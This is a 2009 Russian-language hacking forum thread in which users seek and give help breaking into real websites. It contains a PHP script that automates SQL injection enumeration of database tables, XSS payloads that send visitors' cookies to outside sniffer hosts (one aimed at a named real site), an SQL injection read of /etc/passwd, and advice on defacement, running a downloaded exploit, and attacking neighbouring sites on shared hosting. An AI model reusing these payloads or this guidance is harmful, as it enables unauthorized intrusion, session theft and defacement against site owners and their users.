Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    возможно:)
     
  2. joks

    joks Member

    Joined:
    27 Sep 2008
    Messages:
    16
    Likes Received:
    14
    Reputations:
    0
    я до этого тоже додумался, и спрашивал, потому что нету желания платить за 3-х значный домен, который мне больше не будет нужен. И сайт сам по себе того не стоит, мне чистый дефейс нужно сделать, пробил все сайты на хосте, ни одной потенциальной баги, все статичные htm мелких предприятий...

    з.ы.
    но тут появилась идея попробовать взломать какой-нибудь 2-х или 3-х значный домен =)
     
  3. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Сам вчера распрашивал знакомых по дному вопросу...
    Кароче ответ таков:
    Мускул здесь нипричём, дело в скрипте, если скрипт не поддержует многостроковый вывод, то никак, но зато для автоматизации перебора через лимит написано множество скриптов. Вот один из них:

    PHP:
    <? 

    #Скрипт для перебора значений limit в sql injection 

    set_time_limit(0); 
    error_reporting(0); 

    #В примере: 0x7C - соответствует символу "|", вместе с символом разделителем 0x3a получается запрос, ограниченный  "|:" и ":|" 

    $n="|:";    #начало искомой 
    $n2=":|";       #конец искомой 
    $j=0;       #парсить с 
    $lim=0;      #до (0 - если до конца) 

    function get_page($url){       #получение страницы 
    $link=parse_url($url); 
    $host $link['host']; 
    $src $link['path']; 
    $src .= ($link['query'] > "")?"?".$link['query']:""
    $sock fsockopen ($host80); 
    fputs ($sock"GET /$sr<-b>c HTTP/1.0\r\nHost: $host\r\n\r\n"); 
    $cont ""
    while (!
    feof ($sock)) { $cont .= fgets ($sock); } 
    fclose ($sock); 
    return 
    $cont



    for(
    $i=$j;($lim != 0) ? $i<$lim != 0;$i++){             #получение данных 

    $url="http://www.site.com/products.php?category_id=-1+union+select+1,2,concat_ws(0x3a,0x7c,table_name,column_name,0x7c),4+from+information_schema.columns+limit+$i,1/*";       #ссылка 

    $page=get_page($url); 
    $page=strip_tags($page); 
    $pos=stripos($page,$n); 
    $pos2=stripos($page,$n2,($pos+1)); 
    if(
    $pos == ""){echo "\n Current value - $i"; break;} 
    $page=substr($page,($pos+strlen($n)),($pos2-$pos-strlen($n2))); 
    $page .="\n"
    echo 
    $page

    $r=fopen('out.txt','a+');    #сохранение в файл 
    fputs($r,$page); 
    fclose($r); 


    ?>
    // Вроде бы правила ответа на вопрос не нарушел...
     
    1 person likes this.
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    group_concat

    Но тоже частями, но побольше, побольше

    ЗЫЖ Для тех, кто думает, что через груп-конкат нельзя вывести всё абсолютно, вспомните про знаки ">" и "<" и подзапросы, и не парьте мне мозг своими оценками:)
     
    #6364 Pashkela, 5 Apr 2009
    Last edited: 5 Apr 2009
    1 person likes this.
  5. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    https://forum.antichat.ru/thread30501.html
     
  6. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    dllerk, ошибка вызвана каким то твоим действием, или просто висела на странице??
     
  7. dllerk

    dllerk New Member

    Joined:
    1 Apr 2009
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    никаких действий.. просто там одна буква недотягивает
     
  8. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    Всем привет, есть эксплойт для линукса
    http://www.milw0rm.com/exploits/7405
    Как его использовать? сохранять в текстовом файле?

    есть доступ через шелл на сайт, как вот использовать эксплойт ? куда загружать?
     
  9. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    2 joomler

    Сохраняешь в файле с расширением blabla.c и компилируешь под linux-ом
    gcc -o blabla blabla.c
    тока енто ж вродь DoS експлоит он тебе root не даст
     
    1 person likes this.
  10. razb

    razb Active Member

    Joined:
    24 Mar 2009
    Messages:
    658
    Likes Received:
    133
    Reputations:
    18
    так и есть
    ну может он хочет серв уложить))
     
  11. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Если никаких действий - то это косяк кодера который писал двиг...Из этого можно извлеч лиш пути...
     
  12. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Нука скажи ка мне путь ...
     
    1 person likes this.
  13. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    slider, это был ответ на другой вопрос, смотри внимательнее!

    Ответ был на вопрос:
    Что можно с этим сделать?
    http://qqqq.110mb.com/x.jpg

    как то так...
     
  14. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    нашел на сайте вроде активную xss, в поисковике . никак не могу понять , kak применять ?делал все по forum.antichat.ru/thread20140.html а вот kak подставить к ссылке никак не понимаю.
    сайт не хочу пока что давать.
     
  15. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Если XSS активная - то не надо никакую ядовитую ссылку кидать, яваскрипт выполнится автоматически при заходе на страницу!
     
  16. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Saiga, если пасивка, то кидаешь с линком что то типа:
    <script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>
    да в принципе если и активка, то этот вариант подойдёт ;)

    цитата ниженаписанного:
    без линка сложно будет помочь...
    Иногда линк формируется примерно так:
    http://site.com/blablabla.php"><script>img = new Image();img.src = "http://sniffer.com/sniffer.gif?"+document.cookie;</script>

    Ну это лишь один из случаев...
     
    #6376 -m0rgan-, 6 Apr 2009
    Last edited: 6 Apr 2009
  17. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    3 буквы ру стоят 1 бакс
    http://www.drupal.ru/node/26048
     
  18. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    http://www.toidutare.ee//retsept.php?otsi=1

    <scr_ipt>im*g=new Image();im*g.src="http://sniffer.xaknet.ru/userbars/img_4_551.gi*f?"+document.cookie;</scri_pt>


    что то такое ? но на сниффере , самого меня показывает ))

    это пассивка , спс за помощь
     
    #6378 Saiga, 6 Apr 2009
    Last edited: 6 Apr 2009
  19. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Привет всем ребята помогите

    Нашел сайтик что мне нужно! сделал sql-inj

    Узнал

    Версия версия СУБД (базы данных) - 5.0.45

    пролистал все колонки но нигде не нашел упоминание о admin user
    Что сделал не так кто поможет?

    ,load_file(0x2f6574632f706173737764)

    load_file(/etc/passwd/)

    И просмотрел все 115 полей посмотрел каждое поле думал что админ поменял название ничего нет! Что делать уже не знаю
     
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Значит не судьба, если нужен так именно этот сайт, попробуй поискать баги у "соседей".
     
Thread Status:
Not open for further replies.